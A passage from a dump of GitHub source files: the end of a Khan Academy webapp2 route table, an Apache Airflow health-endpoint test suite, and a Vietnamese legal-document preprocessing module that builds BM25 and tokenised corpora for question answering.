    \" % (kind, count))\n\napplicationSmartHistory = webapp2.WSGIApplication([\n ('/.*', smarthistory.SmartHistoryProxy)\n])\n\napplication = webapp2.WSGIApplication([\n ('/', homepage.ViewHomePage),\n ('/about', util_about.ViewAbout),\n ('/about/blog', blog.ViewBlog),\n ('/about/blog/.*', blog.ViewBlogPost),\n ('/about/the-team', util_about.ViewAboutTheTeam),\n ('/about/getting-started', util_about.ViewGettingStarted),\n ('/about/tos', ViewTOS ),\n ('/about/api-tos', ViewAPITOS),\n ('/about/privacy-policy', ViewPrivacyPolicy ),\n ('/about/dmca', ViewDMCA ),\n ('/contribute', ViewContribute ),\n ('/contribute/credits', ViewCredits ),\n ('/frequently-asked-questions', util_about.ViewFAQ),\n ('/about/faq', util_about.ViewFAQ),\n ('/downloads', util_about.ViewDownloads),\n ('/about/downloads', util_about.ViewDownloads),\n ('/getinvolved', ViewGetInvolved),\n ('/donate', Donate),\n ('/exercisedashboard', exercises.ViewAllExercises),\n\n # Issues a command to re-generate the library content.\n ('/library_content', library.GenerateLibraryContent),\n\n ('/exercise/(.+)', exercises.ViewExercise), # /exercises/addition_1\n ('/exercises', exercises.ViewExercise), # This old /exercises?exid=addition_1 URL pattern is deprecated\n ('/review', exercises.ViewExercise),\n\n ('/khan-exercises/exercises/.*', exercises.RawExercise),\n ('/viewexercisesonmap', exercises.ViewAllExercises),\n ('/editexercise', exercises.EditExercise),\n ('/updateexercise', exercises.UpdateExercise),\n ('/moveexercisemapnodes', exercises.MoveMapNodes),\n ('/admin94040', exercises.ExerciseAdmin),\n ('/video/(.*)', ViewVideo),\n ('/v/(.*)', ViewVideo),\n ('/video', ViewVideo), # Backwards URL compatibility\n ('/sat', ViewSAT),\n ('/gmat', ViewGMAT),\n ('/reportissue', ReportIssue),\n ('/search', Search),\n ('/savemapcoords', knowledgemap.SaveMapCoords),\n ('/saveexpandedallexercises', knowledgemap.SaveExpandedAllExercises),\n ('/crash', Crash),\n\n ('/image_cache/(.+)', ImageCache),\n\n ('/mobilefullsite', MobileFullSite),\n ('/mobilesite', MobileSite),\n\n ('/admin/reput', bulk_update.handler.UpdateKind),\n ('/admin/retargetfeedback', RetargetFeedback),\n ('/admin/startnewbadgemapreduce', util_badges.StartNewBadgeMapReduce),\n ('/admin/badgestatistics', util_badges.BadgeStatistics),\n ('/admin/startnewexercisestatisticsmapreduce', exercise_statistics.StartNewExerciseStatisticsMapReduce),\n ('/admin/startnewvotemapreduce', voting.StartNewVoteMapReduce),\n ('/admin/feedbackflagupdate', qa.StartNewFlagUpdateMapReduce),\n ('/admin/dailyactivitylog', activity_summary.StartNewDailyActivityLogMapReduce),\n ('/admin/youtubesync.*', youtube_sync.YouTubeSync),\n ('/admin/changeemail', ChangeEmail),\n ('/admin/realtimeentitycount', RealtimeEntityCount),\n\n ('/devadmin/emailchange', devpanel.Email),\n ('/devadmin/managedevs', devpanel.Manage),\n ('/devadmin/managecoworkers', devpanel.ManageCoworkers),\n ('/devadmin/commoncore', devpanel.CommonCore),\n\n ('/coaches', coaches.ViewCoaches),\n ('/students', coaches.ViewStudents),\n ('/registercoach', coaches.RegisterCoach),\n ('/unregistercoach', coaches.UnregisterCoach),\n ('/unregisterstudent', coaches.UnregisterStudent),\n ('/requeststudent', coaches.RequestStudent),\n ('/acceptcoach', coaches.AcceptCoach),\n\n ('/createstudentlist', coaches.CreateStudentList),\n ('/deletestudentlist', coaches.DeleteStudentList),\n ('/removestudentfromlist', coaches.RemoveStudentFromList),\n ('/addstudenttolist', coaches.AddStudentToList),\n\n ('/individualreport', coaches.ViewIndividualReport),\n ('/progresschart', coaches.ViewProgressChart),\n ('/sharedpoints', coaches.ViewSharedPoints),\n ('/classreport', coaches.ViewClassReport),\n ('/classtime', coaches.ViewClassTime),\n ('/charts', coaches.ViewCharts),\n\n ('/mailing-lists/subscribe', util_mailing_lists.Subscribe),\n\n ('/profile/graph/activity', util_profile.ActivityGraph),\n ('/profile/graph/focus', util_profile.FocusGraph),\n ('/profile/graph/exercisesovertime', util_profile.ExercisesOverTimeGraph),\n ('/profile/graph/exerciseproblems', util_profile.ExerciseProblemsGraph),\n ('/profile/graph/exerciseprogress', util_profile.ExerciseProgressGraph),\n ('/profile', util_profile.ViewProfile),\n\n ('/profile/graph/classexercisesovertime', util_profile.ClassExercisesOverTimeGraph),\n ('/profile/graph/classenergypointsperminute', util_profile.ClassEnergyPointsPerMinuteGraph),\n ('/profile/graph/classtime', util_profile.ClassTimeGraph),\n ('/class_profile', util_profile.ViewClassProfile),\n\n ('/login', Login),\n ('/login/mobileoauth', MobileOAuthLogin),\n ('/postlogin', PostLogin),\n ('/logout', Logout),\n\n ('/api-apps/register', oauth_apps.Register),\n\n # These are dangerous, should be able to clean things manually from the remote python shell\n\n ('/deletevideoplaylists', DeleteVideoPlaylists),\n ('/killliveassociations', KillLiveAssociations),\n\n # Below are all discussion related pages\n ('/discussion/addcomment', comments.AddComment),\n ('/discussion/pagecomments', comments.PageComments),\n\n ('/discussion/addquestion', qa.AddQuestion),\n ('/discussion/expandquestion', qa.ExpandQuestion),\n ('/discussion/addanswer', qa.AddAnswer),\n ('/discussion/editentity', qa.EditEntity),\n ('/discussion/answers', qa.Answers),\n ('/discussion/pagequestions', qa.PageQuestions),\n ('/discussion/clearflags', qa.ClearFlags),\n ('/discussion/flagentity', qa.FlagEntity),\n ('/discussion/voteentity', voting.VoteEntity),\n ('/discussion/updateqasort', voting.UpdateQASort),\n ('/admin/discussion/finishvoteentity', voting.FinishVoteEntity),\n ('/discussion/deleteentity', qa.DeleteEntity),\n ('/discussion/changeentitytype', qa.ChangeEntityType),\n ('/discussion/videofeedbacknotificationlist', notification.VideoFeedbackNotificationList),\n ('/discussion/videofeedbacknotificationfeed', notification.VideoFeedbackNotificationFeed),\n ('/discussion/moderatorlist', qa.ModeratorList),\n ('/discussion/flaggedfeedback', qa.FlaggedFeedback),\n\n ('/githubpost', github.NewPost),\n ('/githubcomment', github.NewComment),\n\n ('/toolkit', RedirectToToolkit),\n\n ('/paypal/ipn', paypal.IPN),\n\n ('/badges/view', util_badges.ViewBadges),\n ('/badges/custom/create', custom_badges.CreateCustomBadge),\n ('/badges/custom/award', custom_badges.AwardCustomBadge),\n\n ('/notifierclose', util_notify.ToggleNotify),\n ('/newaccount', Clone),\n\n ('/jobs', RedirectToJobvite),\n ('/jobs/.*', RedirectToJobvite),\n\n ('/dashboard', dashboard.Dashboard),\n ('/contentdash', dashboard.ContentDashboard),\n ('/admin/dashboard/record_statistics', dashboard.RecordStatistics),\n ('/admin/entitycounts', dashboard.EntityCounts),\n\n ('/sendtolog', SendToLog),\n\n ('/user_video_css', ServeUserVideoCss),\n\n ('/admin/exercisestats/collectfancyexercisestatistics', exercisestats.CollectFancyExerciseStatistics),\n ('/exercisestats/report', exercisestats.report.Test),\n ('/exercisestats/exerciseovertime', exercisestats.report_json.ExerciseOverTimeGraph),\n ('/exercisestats/geckoboardexerciseredirect', exercisestats.report_json.GeckoboardExerciseRedirect),\n ('/exercisestats/exercisestatsmap', exercisestats.report_json.ExerciseStatsMapGraph),\n ('/exercisestats/exerciseslastauthorcounter', exercisestats.report_json.ExercisesLastAuthorCounter),\n ('/exercisestats/exercisenumbertrivia', exercisestats.report_json.ExerciseNumberTrivia),\n ('/exercisestats/userlocationsmap', exercisestats.report_json.UserLocationsMap),\n ('/exercisestats/exercisescreatedhistogram', exercisestats.report_json.ExercisesCreatedHistogram),\n\n ('/goals/new', goals.handlers.CreateNewGoal),\n ('/goals/admincreaterandom', goals.handlers.CreateRandomGoalData),\n\n ('/robots.txt', robots.RobotsTxt),\n\n ('/r/.*', redirects.Redirect),\n ('/redirects', redirects.List),\n ('/redirects/add', redirects.Add),\n ('/redirects/remove', redirects.Remove),\n\n # Redirect any links to old JSP version\n ('/.*\\.jsp', PermanentRedirectToHome),\n ('/index\\contribute', PermanentRedirectToHome),\n\n ('/_ah/warmup.*', warmup.Warmup),\n\n # -- KHAN-NL -----------------------------------\n ('/nl-content/.*', nl.Content),\n ('/nl_report', nl_report.BugReporter),\n\t('/helpmee', nl.LinkerHelpmee),\n\n ], debug=True)\n\napplication = profiler.ProfilerWSGIMiddleware(application)\napplication = GAEBingoWSGIMiddleware(application)\napplication = request_cache.RequestCacheMiddleware(application)\n\ndef main():\n if os.environ[\"SERVER_NAME\"] == \"smarthistory.khanacademy.org\":\n run_wsgi_app(applicationSmartHistory)\n else:\n run_wsgi_app(application)\n\nif __name__ == '__main__':\n main()\n","repo_name":"KhanWorld/KhanAcademy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":37707,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"32682330613","text":"from __future__ import annotations\n\nfrom datetime import timedelta\nfrom unittest import mock\n\nimport pytest\n\nfrom airflow.jobs.job import Job\nfrom airflow.jobs.scheduler_job_runner import SchedulerJobRunner\nfrom airflow.utils import timezone\nfrom airflow.utils.session import create_session, provide_session\nfrom airflow.utils.state import State\n\nHEALTHY = \"healthy\"\nUNHEALTHY = \"unhealthy\"\n\n\nclass TestHealthTestBase:\n @pytest.fixture(autouse=True)\n def setup_attrs(self, minimal_app_for_api) -> None:\n self.app = minimal_app_for_api\n self.client = self.app.test_client() # type:ignore\n with create_session() as session:\n session.query(Job).delete()\n\n def teardown_method(self):\n with create_session() as session:\n session.query(Job).delete()\n\n\nclass TestGetHealth(TestHealthTestBase):\n @provide_session\n def test_healthy_scheduler_status(self, session):\n last_scheduler_heartbeat_for_testing_1 = timezone.utcnow()\n job = Job(state=State.RUNNING, latest_heartbeat=last_scheduler_heartbeat_for_testing_1)\n SchedulerJobRunner(job=job)\n session.add(job)\n session.commit()\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"healthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert \"healthy\" == resp_json[\"scheduler\"][\"status\"]\n assert (\n last_scheduler_heartbeat_for_testing_1.isoformat()\n == resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"]\n )\n\n @provide_session\n def test_unhealthy_scheduler_is_slow(self, session):\n last_scheduler_heartbeat_for_testing_2 = timezone.utcnow() - timedelta(minutes=1)\n job = Job(state=State.RUNNING, latest_heartbeat=last_scheduler_heartbeat_for_testing_2)\n SchedulerJobRunner(job=job)\n session.add(job)\n session.commit()\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"healthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert \"unhealthy\" == resp_json[\"scheduler\"][\"status\"]\n assert (\n last_scheduler_heartbeat_for_testing_2.isoformat()\n == resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"]\n )\n\n def test_unhealthy_scheduler_no_job(self):\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"healthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert \"unhealthy\" == resp_json[\"scheduler\"][\"status\"]\n assert resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"] is None\n\n @mock.patch.object(SchedulerJobRunner, \"most_recent_job\")\n def test_unhealthy_metadatabase_status(self, most_recent_job_mock):\n most_recent_job_mock.side_effect = Exception\n resp_json = self.client.get(\"/api/v1/health\").json\n assert \"unhealthy\" == resp_json[\"metadatabase\"][\"status\"]\n assert resp_json[\"scheduler\"][\"latest_scheduler_heartbeat\"] is None\n","repo_name":"a0x8o/airflow","sub_path":"tests/api_connexion/endpoints/test_health_endpoint.py","file_name":"test_health_endpoint.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"73030843939","text":"import re\nimport math\nimport json\nimport pandas as pd\nimport string \n\n# common phrases in legal documents\nre_thuchientheo = re.compile(\n r\"((((được\\s)?thực hiện theo qu[iy] định tại\\s|hướng dẫn tại\\s|theo qu[iy] định tại\\s|(được\\s)?thực hiện theo\\s|theo qu[iy] định tại\\s|theo nội dung qu[yi] định tại\\s|quy[iy] định tại|theo\\s)(các\\s)?)?|tại\\s(các\\s)?)(khoản(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điều(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điểm\\s(([a-z]|đ)\\,\\s)*([a-z]|đ)\\b|chương(\\ssố)?\\s(\\d+\\,\\s)*\\d+)((\\s|\\,\\s|\\s\\,\\s|\\svà\\s)(khoản(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điều(\\ssố)?\\s(\\d+\\,\\s)*\\d+|điểm\\s(([a-z]|đ)\\,\\s)*([a-z]|đ)\\b|chương(\\ssố)?\\s(\\d+\\,\\s)*\\d+))*(\\s(điều này|thông tư này|nghị quyết này|quyết định này|nghị định này|văn bản này|quyết định này))?\"\n)\nre_thongtuso = re.compile(\n r\"(thông tư liên tịch|thông tư|nghị quyết|quyết định|nghị định|văn bản|Thông tư liên tịch|Thông tư|Nghị quyết|Nghị định|Văn bản|Quyết định)\\s(số\\s)?(([a-z0-9]|đ|\\-)+\\/([a-z0-9]|đ|\\-|\\/)*)\"\n)\nre_ngay = re.compile(r\"ngày\\s\\d+\\/\\d+\\/\\d+\\b|ngày\\s\\d+tháng\\d+năm\\d+\")\nre_thang_nam = re.compile(r\"tháng\\s\\d+\\/\\d+|tháng\\s\\d+|năm\\s\\d+\")\nre_chuong = re.compile(\n r\"chương\\s(III|II|IV|IX|VIII|VII|VI|XIII|XII|XI|XIV|XIX|XVIII|XVII|XVI|XV|XX|V|X|I|XXIII|XXII|XXI|XXIV|XXVIII|XXVII|XXVI|XXV|XXIX|XXX)\\b\"\n)\n\n# common end phrases in questions\nEND_PHRASES = [\n \"có đúng không\",\n \"đúng không\",\n \"được không\",\n \"hay không\",\n \"được hiểu thế nào\",\n \"được quy định cụ thể là gì\",\n \"được quy định như thế nào\",\n \"được quy định thế nào\",\n \"được quy định như nào\",\n \"trong trường hợp như nào\",\n \"trong trường hợp như thế nào\",\n \"trong trường hợp nào\",\n \"trong những trường hợp nào\",\n \"được hiểu như thế nào\",\n \"được hiểu như nào\",\n \"như thế nào\",\n \"thế nào\",\n \"như nào\",\n \"là gì\",\n \"là ai\",\n \"là bao nhiêu\",\n \"bao nhiêu\",\n \"trước bao lâu\",\n \"là bao lâu\",\n \"bao lâu\",\n \"bao gồm gì\",\n \"không\",\n \"bao gồm những gì\",\n \"vào thời điểm nào\",\n \"gồm những giấy tờ gì\",\n \"những yêu cầu nào\",\n]\n\n# punctuations, characters, stop-words \npunc = \"\"\"!\"#$%&'()*+,-./:;<=>?@[\\]^`{|}~\"\"\" # noqa: W605\ntable = str.maketrans(\"\", \"\", punc)\n\npunctuation = [x for x in string.punctuation]\nnumber = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\"]\nchars = [\"a\", \"b\", \"c\", \"d\", \"đ\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\"]\nstop_word = number + chars + [\"của\", \"và\", \"các\", \"có\", \"được\", \"theo\", \"tại\", \"trong\", \"về\", \n \"hoặc\", \"người\", \"này\", \"khoản\", \"cho\", \"không\", \"từ\", \"phải\", \n \"ngày\", \"việc\", \"sau\", \"để\", \"đến\", \"bộ\", \"với\", \"là\", \"năm\", \n \"khi\", \"số\", \"trên\", \"khác\", \"đã\", \"thì\", \"thuộc\", \"điểm\", \"đồng\",\n \"do\", \"một\", \"bị\", \"vào\", \"lại\", \"ở\", \"nếu\", \"làm\", \"đây\", \n \"như\", \"đó\", \"mà\", \"nơi\", \"”\", \"“\"]\nbm25_removed = punctuation + stop_word\n\n# defining sub-functions\n\ndef remove_dieu_number(text):\n '''\n This funtion removes the common legal phrases out from texts\n '''\n text = re_thuchientheo.sub(\" \", text)\n text = re_thongtuso.sub(\" \", text)\n text = re_ngay.sub(\" \", text)\n text = re_thang_nam.sub(\" \", text)\n text = re_chuong.sub(\" \", text)\n return \" \".join(text.split())\n\n\ndef remove_other_number_by_zero(text):\n '''\n This funtion replaces numeric characters in texts into 0 for easier handling\n '''\n for digit in [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]:\n text = text.replace(digit, \"0\")\n return text\n\n\ndef remove_punct(text):\n '''\n This funtion replaces punctuations in texts for easier handling\n '''\n text = text.replace(\";\", \",\").replace(\":\", \".\").replace(\"“\", \" \").replace(\"”\", \" \")\n text = \"\".join(\n [\n c\n if c.isalpha() or c.isdigit() or c in [\" \", \",\", \"(\", \")\", \".\", \"/\", \"-\"]\n else \" \"\n for c in text\n ]\n )\n text = \" \".join(text.split())\n return text\n\ndef lower_or_keep(text):\n \"This funtion lower words but not for abbreviations\"\n lst = text.split(\" \")\n newlst = [x if x.isupper() else x.lower() for x in lst]\n return \" \".join(newlst)\n\ndef preprocess_all_title(article_title):\n \"\"\"\n Preprocess titles of documents\n \"\"\"\n article_title = lower_or_keep(article_title)\n lst = article_title.split()\n new_lst = []\n for i in range(len(lst)):\n if lst[i] == 'số' and i == len(lst)-1:\n new_lst.append(lst[i])\n elif lst[i] == 'số' and \"/\" in lst[i+1]:\n pass\n elif \"/\" in lst[i]:\n pass\n else:\n new_lst.append(lst[i])\n article_title = \" \".join(new_lst)\n article_title = remove_dieu_number(article_title)\n #article_title = remove_other_number_by_zero(article_title)\n article_title = remove_punct(article_title)\n article_title = article_title.replace(\"về\", \"\")\n if \"do\" in article_title and \"ban hành\" in article_title:\n idx = article_title.rfind(\"do\")\n article_title = article_title[:(idx-1)]\n \n re_head = re.compile(r\"(thông tư liên tịch|thông tư|nghị quyết|quyết định|nghị định|văn bản)\\s(quy định|hướng dẫn)?\")\n article_title = re_head.sub(\" \", article_title)\n article_title = article_title.replace(\" \", \" \")\n article_title = article_title.replace(\" \", \" \")\n return article_title.strip()\n\ndef preprocess_article_title(article_title):\n \"\"\"\n Preprocess titles of documents\n \"\"\"\n article_title = lower_or_keep(article_title)\n article_title = \" \".join(article_title.split()[2:]) # Dieu 1.\n article_title = remove_dieu_number(article_title)\n #article_title = remove_other_number_by_zero(article_title)\n article_title = remove_punct(article_title)\n return article_title\n \ndef preprocess_khoan(khoan):\n \"\"\"\n Perprocess parts in a legal documents\n \"\"\"\n khoan = lower_or_keep(khoan)\n khoan = khoan.replace(\"\\xa0\", \"\")\n matched = re.match(r\"^\\d+\\.(\\d+\\.?)?\\s\", khoan) # 1. 2.2. 2.2\n if matched is not None:\n khoan = khoan[matched.span()[1]:].strip()\n\n else:\n matched2 = re.match(r\"^[\\wđ]\\)\\s\", khoan)\n if matched2 is not None:\n khoan = khoan[matched2.span()[1]:].strip()\n\n khoan = remove_dieu_number(khoan)\n #khoan = khoan.replace(\"đ)\",\"\")\n khoan = re.sub(r\"[\\wđ]\\) \",\"\", khoan)\n khoan = re.sub(r\"[\\wđ]\\. \",\"\", khoan)\n khoan = re.sub(r\"\\d+\\.\\d+\\.\\d+\\. \", \"\", khoan)\n khoan = re.sub(r\"\\d+\\.\\d+\\. \", \"\", khoan)\n khoan = re.sub(r\"\\d+\\. \", \"\", khoan)\n #khoan = re.sub(r\"[0-9]\\. \", \"\", khoan)\n #khoan = remove_other_number_by_zero(khoan)\n khoan = remove_punct(khoan)\n khoan = khoan.replace(\". .\", \".\")\n khoan = khoan.replace(\"..\", \".\")\n khoan = khoan.replace(\", ,\", \",\")\n khoan = khoan.replace(\",,\", \",\")\n khoan = khoan.strip()\n return \" \".join(khoan.split())\n\n\ndef preprocess_question(q, remove_end_phrase=True):\n \"\"\"\n Preprocess questions\n \"\"\"\n q = lower_or_keep(q)\n q = remove_dieu_number(q)\n q = \"\".join([c if c.isalpha() or c.isdigit() or c == \" \" else \" \" for c in q])\n q = remove_punct(q)\n if remove_end_phrase:\n for phrase in END_PHRASES:\n if q.endswith(phrase):\n q = q[: -len(phrase)]\n break\n\n return q.strip()\n\n'''def tokenise(text, segmenter):\n \"\"\"\n Segment the texts with vncorenlp-segemnter\n \"\"\"\n result = segmenter.tokenize(text)\n rlt = \"\"\n for i in range(len(result)-1):\n rlt += \" \".join(result[i])\n rlt += \" \"\n rlt += \" \".join(result[len(result)-1])\n return rlt\n'''\ndef tokenise(text, f):\n \"\"\"\n Segment the texts with pyvi tokenizer\n \"\"\"\n return f(text)\n \ndef remove_stopword(w):\n \"Remove stopwords in texts\"\n return w not in stop_word\n\ndef bm25_process(text, f):\n \"\"\"\n Processing texts for bm25: remove all puntuations, lower all words\n \"\"\"\n text = tokenise(text, f)\n words = text.lower().split(\" \")\n result = [w for w in words if w not in bm25_removed]\n stripped = \" \".join(result)\n result = \" \".join(stripped.split(\" \"))\n return result\n\ndef length(sentence):\n \"Return the length in words of sentences\"\n return len(sentence.split())\n\ndef build_corpus(f, corpus_file, law_dict, scorpus_ids, head = False):\n \"\"\"\n Build a corpus-dataframe\n \"\"\"\n law_ids = []\n text_ids = []\n article_ids = []\n titles = []\n texts = []\n processed_texts = []\n tokenized_texts = []\n bm25texts = []\n lengths = []\n ids = []\n sub_ids = []\n count = 0\n\n with open (corpus_file, 'r') as input:\n data = json.load(input)\n \n for law in data:\n for article in law['articles']:\n ids.append(count)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_id = law['law_id'] + \"_\" + article['article_id']\n text_ids.append(text_id)\n \n titles.append(article['title'])\n texts.append(article['text'])\n \n title = preprocess_article_title(article[\"title\"])\n head = preprocess_all_title(law_dict[law['law_id']])\n \n cac_khoan = article[\"text\"].split(\"\\n\")\n khoan_clean = []\n for khoan in cac_khoan:\n khoan = preprocess_khoan(khoan)\n khoan_clean.append(khoan.strip())\n article_text = \" \".join(khoan_clean)\n if head:\n processed_text = head + \". \" + title + \". \" + article_text\n else:\n processed_text = title + \". \" + article_text + \". \" + head + \".\"\n processed_texts.append(processed_text)\n start_sub_id = scorpus_ids.index(count)\n try:\n end_sub_id = scorpus_ids.index(count+1)\n sub_ids.append([i for i in range(start_sub_id, end_sub_id)])\n except:\n sub_ids.append([i for i in range(start_sub_id, len(scorpus_ids))])\n \n try: \n tokenized_text = tokenise(processed_text, f)\n tokenized_texts.append(tokenized_text)\n lengths.append(length(tokenized_text))\n except:\n tokenized_text = tokenise(processed_text[:50000], f)\n tokenized_texts.append(tokenized_text)\n lengths.append(length(tokenized_text))\n bm25texts.append(bm25_process(processed_text, f))\n count += 1\n \n df = pd.DataFrame()\n df[\"id\"] = ids\n df[\"law_id\"] = law_ids\n df[\"article_id\"] = article_ids\n df[\"text_id\"] = text_ids\n df[\"title\"] = titles\n df[\"text\"] = texts\n df[\"processed_text\"] = processed_texts\n df[\"sub_id\"] = sub_ids\n df[\"tokenized_text\"] = tokenized_texts\n df[\"bm25text\"] = bm25texts\n df[\"len\"] = lengths\n \n return df\n\ndef create_sliding_window(tokenized_text, size=200, overlap=64):\n \"\"\"\n Create list of windows for a text\n \"\"\"\n sentences = tokenized_text.split(\".\")\n words = tokenized_text.split(\" \")\n title = sentences[0]\n words = [w for w in words if len(w) >0]\n actual_size = size - overlap\n \n windows = []\n n_windows = math.ceil(len(words)/actual_size)\n for i in range(n_windows):\n windows.append(\" \".join(words[i*actual_size:i*actual_size + size]))\n for i in range(1, n_windows):\n if not windows[i].startswith(\".\"):\n windows[i] = title + \". \" + windows[i]\n else:\n windows[i] = title + windows[i]\n return windows\n\ndef build_short_corpus(f, corpus_file, law_dict, head=False, size=200, overlap=64):\n \"\"\"\n Build a corpus-dataframe\n \"\"\"\n ids = []\n law_ids = []\n text_ids = []\n article_ids = []\n titles = []\n texts = []\n processed_texts = []\n sub_ids = []\n tokenized_texts = []\n bm25texts = []\n lengths = []\n\n with open (corpus_file, 'r') as input:\n data = json.load(input)\n idx = 0\n sub_idx = 0\n for law in data:\n for article in law['articles']:\n text_id = law['law_id'] + \"_\" + article['article_id']\n title = preprocess_article_title(article[\"title\"])\n head = preprocess_all_title(law_dict[law['law_id']])\n cac_khoan = article[\"text\"].split(\"\\n\")\n khoan_clean = []\n for khoan in cac_khoan:\n khoan = preprocess_khoan(khoan)\n khoan_clean.append(khoan.strip())\n article_text = \" \".join(khoan_clean)\n if head:\n processed_text = head + \". \" + title + \". \" + article_text\n else:\n processed_text = title + \". \" + article_text + \". \" + head + \".\"\n try: \n tokenized_text = tokenise(processed_text, f)\n tokenized_len = length(tokenized_text)\n if tokenized_len <= size + 10:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(tokenized_text)\n lengths.append(tokenized_len)\n bm25texts.append(bm25_process(processed_text, f))\n sub_idx +=1\n else:\n windows = create_sliding_window(tokenized_text, size=224, overlap=64)\n for window in windows:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(window)\n lengths.append(length(window))\n bm25texts.append(bm25_process(window, f)) \n sub_idx +=1\n except:\n actual_size = 50000 - overlap\n big_windows = []\n n_big_windows = math.ceil(len(processed_text)/actual_size)\n for i in range(n_big_windows):\n big_windows.append(\"\".join(processed_text[i*actual_size:i*actual_size + size]))\n for big_window in big_windows:\n tokenized_text = tokenise(big_window, f)\n tokenized_len = length(tokenized_text)\n if tokenized_len > size + 10:\n windows = create_sliding_window(tokenized_text, size=224, overlap=64)\n for window in windows:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(window)\n lengths.append(length(window))\n bm25texts.append(bm25_process(window, f)) \n sub_idx +=1\n else:\n ids.append(idx)\n law_ids.append(law['law_id'])\n article_ids.append(article['article_id'])\n text_ids.append(text_id)\n titles.append(article['title'])\n texts.append(article['text'])\n processed_texts.append(processed_text)\n sub_ids.append(sub_idx)\n tokenized_texts.append(tokenized_text)\n lengths.append(tokenized_len)\n bm25texts.append(bm25_process(processed_text, f))\n sub_idx +=1\n \n idx += 1\n \n df = pd.DataFrame()\n df[\"id\"] = ids\n df[\"law_id\"] = law_ids\n df[\"article_id\"] = article_ids\n df[\"text_id\"] = text_ids\n df[\"title\"] = titles\n df[\"text\"] = texts\n df[\"processed_text\"] = processed_texts\n df[\"sub_id\"] = sub_ids\n df[\"tokenized_text\"] = tokenized_texts\n df[\"bm25text\"] = bm25texts\n df[\"len\"] = lengths\n \n return df\n\ndef build_qa(f, df, qa_file, split = False):\n \"\"\"\n Build a question-answer dataframe\n \"\"\"\n text_ids = df[\"text_id\"].tolist()\n titles = df[\"title\"].tolist()\n texts = df[\"text\"].tolist()\n lengths = df[\"len\"].tolist()\n sub_ids = df[\"sub_id\"].tolist()\n q_texts = []\n q_processed_texts = []\n q_tokenized_texts = []\n q_bm25texts = []\n q_lens = []\n no_ans = []\n ans_ids = []\n ans_text_ids = []\n ans_titles = []\n ans_texts = []\n ans_lens = []\n ans_sub_ids = []\n with open (qa_file, 'r') as input:\n data = json.load(input)\n \n if not split:\n for item in data['items']:\n question = item[\"question\"]\n q_texts.append(question)\n q_processed_text = preprocess_question(question, remove_end_phrase=False)\n q_processed_texts.append(q_processed_text)\n q_tokenized_text = tokenise(q_processed_text, f)\n q_tokenized_texts.append(q_tokenized_text)\n q_bm25texts.append(bm25_process(q_processed_text, f))\n q_lens.append(length(q_tokenized_text))\n ans_text_id = \"\"\n ans_id = \"\"\n ans_title = \"\"\n ans_text = \"\"\n ans_len = \"\"\n ans_count = 0\n ans_sub_id = []\n for i in range(len(item['relevant_articles'])):\n ans_count += 1\n atext_id = item['relevant_articles'][i]['law_id'] + \"_\" + item['relevant_articles'][i]['article_id']\n a_id = text_ids.index(atext_id)\n ans_text_id += atext_id\n ans_id += str(a_id)\n ans_title += titles[a_id]\n ans_text += texts[a_id]\n ans_len += str(lengths[a_id])\n sub_id = sub_ids[a_id]\n ans_sub_id += sub_id\n \n if i < len(item[\"relevant_articles\"]) - 1:\n ans_text_id += \", \"\n ans_id += \", \"\n ans_title += \", \"\n ans_text += \", \"\n ans_len += \", \"\n \n no_ans.append(ans_count)\n ans_text_ids.append(ans_text_id)\n ans_ids.append(ans_id)\n ans_titles.append(ans_title)\n ans_texts.append(ans_text)\n ans_lens.append(ans_len)\n ans_sub_ids.append(ans_sub_id)\n else:\n for item in data['items']:\n question = item[\"question\"]\n for article in item['relevant_articles']:\n q_texts.append(question)\n q_processed_text = preprocess_question(question, remove_end_phrase=False)\n q_processed_texts.append(q_processed_text)\n q_tokenized_text = tokenise(q_processed_text, f)\n q_tokenized_texts.append(q_tokenized_text)\n q_bm25texts.append(bm25_process(q_processed_text, f))\n q_lens.append(length(q_tokenized_text)) \n ans_text_id = article['law_id'] + \"_\" + article['article_id']\n ans_text_ids.append(ans_text_id)\n a_id = text_ids.index(ans_text_id)\n ans_ids.append(a_id)\n ans_titles.append(titles[a_id])\n ans_texts.append(texts[a_id])\n ans_lens.append(lengths[a_id])\n ans_sub_ids.append(sub_ids[a_id])\n \n \n df = pd.DataFrame()\n df[\"question\"] = q_texts\n df[\"processed_question\"] = q_processed_texts\n df[\"tokenized_question\"] = q_tokenized_texts\n df[\"bm25_question\"] = q_bm25texts\n df[\"ques_len\"] = q_lens\n if not split:\n df['no_ans'] = no_ans\n df[\"ans_text_id\"] = ans_text_ids\n df[\"ans_id\"] = ans_ids\n df[\"ans_title\"] = ans_titles\n df[\"ans_text\"] = ans_texts\n 